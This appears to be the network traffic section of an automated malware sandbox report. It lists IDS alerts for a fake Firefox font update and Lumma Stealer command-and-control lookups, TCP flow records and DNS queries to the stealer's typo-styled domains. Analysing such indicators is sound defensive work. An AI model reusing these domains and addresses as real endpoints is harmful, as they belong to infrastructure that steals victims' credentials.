                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                          2025-04-28T19:34:28.895163+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549695172.67.182.68443TCP
                                                                                                                                                                                                                          2025-04-28T19:34:48.826594+02002061853ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (geographys .run)1192.168.2.5577281.1.1.153UDP
                                                                                                                                                                                                                          2025-04-28T19:34:49.176939+02002061859ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live)1192.168.2.5607151.1.1.153UDP
                                                                                                                                                                                                                          2025-04-28T19:34:49.338097+02002061851ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cartograhphy .top)1192.168.2.5593811.1.1.153UDP
                                                                                                                                                                                                                          2025-04-28T19:34:49.494621+02002061849ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (biosphxere .digital)1192.168.2.5593281.1.1.153UDP
                                                                                                                                                                                                                          2025-04-28T19:34:49.655128+02002061857ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (topographky .top)1192.168.2.5593711.1.1.153UDP
                                                                                                                                                                                                                          2025-04-28T19:34:50.084494+02002061807ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (climatologfy .top)1192.168.2.5639211.1.1.153UDP
                                                                                                                                                                                                                          2025-04-28T19:34:50.242689+02002061861ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vigorbridgoe .top)1192.168.2.5595761.1.1.153UDP
                                                                                                                                                                                                                          2025-04-28T19:34:51.062891+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54969823.52.218.12443TCP
                                                                                                                                                                                                                          2025-04-28T19:34:52.111729+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549699104.21.36.133443TCP
                                                                                                                                                                                                                          2025-04-28T19:34:55.245027+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549700104.21.36.133443TCP
                                                                                                                                                                                                                          2025-04-28T19:34:56.620929+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549701104.21.36.133443TCP
                                                                                                                                                                                                                          2025-04-28T19:34:59.244166+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549702104.21.36.133443TCP
                                                                                                                                                                                                                          2025-04-28T19:35:01.243642+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549703104.21.36.133443TCP
                                                                                                                                                                                                                          2025-04-28T19:35:04.153586+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.36.133443TCP

                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                          • Total Packets: 118
                                                                                                                                                                                                                          • 443 (HTTPS)
                                                                                                                                                                                                                          • 53 (DNS)
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.511717081 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.511774063 CEST44349695172.67.182.68192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.511847019 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.513199091 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.513209105 CEST44349695172.67.182.68192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.895051956 CEST44349695172.67.182.68192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.895163059 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.899089098 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.899100065 CEST44349695172.67.182.68192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.899847984 CEST44349695172.67.182.68192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.937721014 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.937755108 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.937911987 CEST44349695172.67.182.68192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:48.796422005 CEST44349695172.67.182.68192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:48.850117922 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.752809048 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.752839088 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.752922058 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.753264904 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.753273964 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.062808037 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.062891006 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.064337015 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.064342022 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.065002918 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.065989971 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.108299017 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.369265079 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.369606972 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.371423960 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.371460915 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.371537924 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.371566057 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.501975060 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.502182961 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.529293060 CEST4434969823.52.218.12192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.529433012 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.744782925 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.744883060 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.744967937 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.745323896 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.745345116 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.111630917 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.111728907 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.119738102 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.119767904 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.120543003 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.121608973 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.121653080 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.121685028 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.733427048 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.734555960 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.734663010 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.736370087 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.736577034 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.754018068 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.754117012 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.755237103 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.803149939 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.891115904 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.891210079 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893121958 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893157005 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893224001 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893223047 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.893296003 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.894691944 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:52.894767046 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.349978924 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.350081921 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.350363016 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.350455046 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:53.396270990 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559277058 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559478998 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559573889 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559760094 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.559978008 CEST44349699104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.560036898 CEST49699443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887079954 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887162924 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887239933 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887768030 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:54.887787104 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.244801044 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.245027065 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.246231079 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.246258974 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.247116089 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.248198032 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.248337984 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.249758959 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.249864101 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.250493050 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946224928 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946424961 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946491957 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946553946 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946573019 CEST44349700104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:55.946621895 CEST49700443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266017914 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266098976 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266191959 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266493082 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.266509056 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.620727062 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.620929003 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.622364044 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.622374058 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.622776031 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.624347925 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.624506950 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.625971079 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.626079082 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:56.626476049 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:57.495385885 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:57.495577097 CEST44349701104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:57.495670080 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:57.495712996 CEST49701443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.902874947 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.902945995 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.903018951 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.903320074 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:58.903328896 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.244038105 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.244165897 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.245918989 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.245933056 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.246308088 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.247951031 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.248080969 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.248918056 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.672833920 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.673022032 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.673171043 CEST44349702104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.673191071 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.673191071 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:34:59.673238039 CEST49702443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:00.889539957 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:00.889583111 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:00.889717102 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:00.890120029 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:00.890129089 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.243560076 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.243642092 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.244823933 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.244834900 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.245378017 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.287561893 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.334135056 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.335120916 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.335848093 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.335972071 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.336016893 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.336127996 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.336905956 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337032080 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337064981 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337204933 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337235928 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337379932 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337409973 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337423086 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337443113 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337549925 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337582111 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337610006 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337624073 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337690115 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337709904 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337729931 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337744951 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337791920 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337816954 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337836981 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337858915 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.337894917 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:01.338053942 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.662631035 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.662688017 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.662728071 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.662749052 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.665887117 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.666093111 CEST44349703104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.666146994 CEST49703443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.800678968 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.800725937 CEST44349704104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.801090002 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.801342964 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:03.801348925 CEST44349704104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.153470039 CEST44349704104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.153585911 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.154761076 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.154766083 CEST44349704104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.155375957 CEST44349704104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.209485054 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.217695951 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.217695951 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.217932940 CEST44349704104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.668612957 CEST44349704104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.669495106 CEST44349704104.21.36.133192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:35:04.669569969 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          Apr 28, 2025 19:35:05.247796059 CEST49695443192.168.2.5172.67.182.68
                                                                                                                                                                                                                          Apr 28, 2025 19:35:05.248075008 CEST49698443192.168.2.523.52.218.12
                                                                                                                                                                                                                          Apr 28, 2025 19:35:05.248172998 CEST49704443192.168.2.5104.21.36.133
                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                          Apr 28, 2025 19:34:09.525156975 CEST53571561.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.271243095 CEST5004653192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.478075981 CEST53500461.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:48.826594114 CEST5772853192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:48.990664005 CEST53577281.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.001962900 CEST4964353192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.167403936 CEST53496431.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.176939011 CEST6071553192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.336050987 CEST53607151.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.338097095 CEST5938153192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.492019892 CEST53593811.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.494621038 CEST5932853192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.653400898 CEST53593281.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.655128002 CEST5937153192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.082580090 CEST53593711.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.084494114 CEST6392153192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.241004944 CEST53639211.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.242688894 CEST5957653192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.598680019 CEST53595761.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.600178957 CEST6530553192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.751776934 CEST53653051.1.1.1192.168.2.5
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.571799994 CEST5445153192.168.2.51.1.1.1
                                                                                                                                                                                                                          Apr 28, 2025 19:34:51.743921041 CEST53544511.1.1.1192.168.2.5

                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                          Apr 28, 2025 19:34:28.271243095 CEST192.168.2.51.1.1.10xd5adStandard query (0)transdataa.digitalA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:48.826594114 CEST192.168.2.51.1.1.10xc121Standard query (0)geographys.runA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.001962900 CEST192.168.2.51.1.1.10x5da5Standard query (0)woodpeckersd.runA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.176939011 CEST192.168.2.51.1.1.10x3897Standard query (0)tropiscbs.liveA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.338097095 CEST192.168.2.51.1.1.10x27c4Standard query (0)cartograhphy.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.494621038 CEST192.168.2.51.1.1.10x1b0dStandard query (0)biosphxere.digitalA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:49.655128002 CEST192.168.2.51.1.1.10x9b31Standard query (0)topographky.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.084494114 CEST192.168.2.51.1.1.10x8299Standard query (0)climatologfy.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.242688894 CEST192.168.2.51.1.1.10x65deStandard query (0)vigorbridgoe.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                          Apr 28, 2025 19:34:50.600178957 CEST192.168.2.51.1.1.10xf3faStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
